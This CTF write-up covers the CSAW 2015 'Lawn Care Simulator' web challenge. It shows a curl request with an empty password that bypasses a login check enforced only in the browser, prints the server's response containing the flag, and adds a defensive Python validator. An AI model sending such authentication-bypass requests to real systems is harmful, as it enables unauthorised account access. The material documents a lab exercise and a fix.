CSAW 2015 - Lawn Care Simulator (200pts) writeup

The challenge description was: http://54.165.252.74:8089/

This web challenge was really easy; actually, it was so easy that I think it wasn't meant to be that way. When you visit the link you are greeted with the following screen:

[Screenshot: CSAW 2015 - Lawn Care Simulator (200pts) writeup - 01]

Checking for SQL injection wasn't returning anything indicating it was what we had to do, so I checked the network traffic while trying to log in and got the following POST data:

**username:** test
**password:** 098f6bcd4621d373cade4e832627b4f6

Logging in without any password wasn't possible, but that was checked on the client side, so I tried it with curl in a terminal:

```
mrt$ curl 'http://54.165.252.74:8089/premium.php' --data 'username=admin&password='
<html>
<head>
<title>Lawn Care Simulator 2015</title>
<script src="//code.jquery.com/jquery-1.11.3.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
</head>
<body>
<h1>flag{gr0wth__h4ck!nG!1!1!</h1></body></html>
```

We got our flag:

flag{gr0wth__h4ck!nG!1!1!}
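
The empty-password check above lived only in the browser, so the server has to repeat it. The following is an added example, not the challenge's server code (which this writeup does not show): a server-side check for the same POST format, where `USERS`, `parse_form` and `check_login` are hypothetical names and the account store is constructed.

```python
import hashlib
import hmac
import re
from urllib.parse import parse_qs

# Constructed account store: username -> MD5 hex digest, the format the login
# form posts. MD5 only mirrors that wire format; it is not a recommendation.
USERS = {"test": hashlib.md5(b"test").hexdigest()}
# Digest compared against for unknown users so both paths do the same work.
DUMMY = "0" * 32
MD5_HEX = re.compile(r"[0-9a-f]{32}")


def parse_form(body: str) -> dict:
    """Parse a urlencoded body, keeping blank fields such as 'password='."""
    fields = parse_qs(body, keep_blank_values=True)
    # Drop repeated parameters instead of silently picking one of the values.
    return {k: v[0] for k, v in fields.items() if len(v) == 1}


def check_login(body: str) -> tuple:
    """Return (accepted, reason) for a raw POST body."""
    form = parse_form(body)
    username = form.get("username", "")
    password = form.get("password", "")
    # The check the browser performed, repeated where it cannot be skipped.
    if not username or not password:
        return (False, "missing credential")
    # Anything that is not a 32-character lowercase hex digest is rejected
    # before it reaches the comparison.
    if not MD5_HEX.fullmatch(password):
        return (False, "malformed password digest")
    stored = USERS.get(username, DUMMY)
    # Constant-time comparison of the full digest.
    match = hmac.compare_digest(stored, password)
    if match and username in USERS:
        return (True, "ok")
    return (False, "invalid credentials")


if __name__ == "__main__":
    # The request body from the curl command in the writeup.
    print(check_login("username=admin&password="))
    # The request body captured from the browser in the writeup.
    print(check_login("username=test&password=098f6bcd4621d373cade4e832627b4f6"))
```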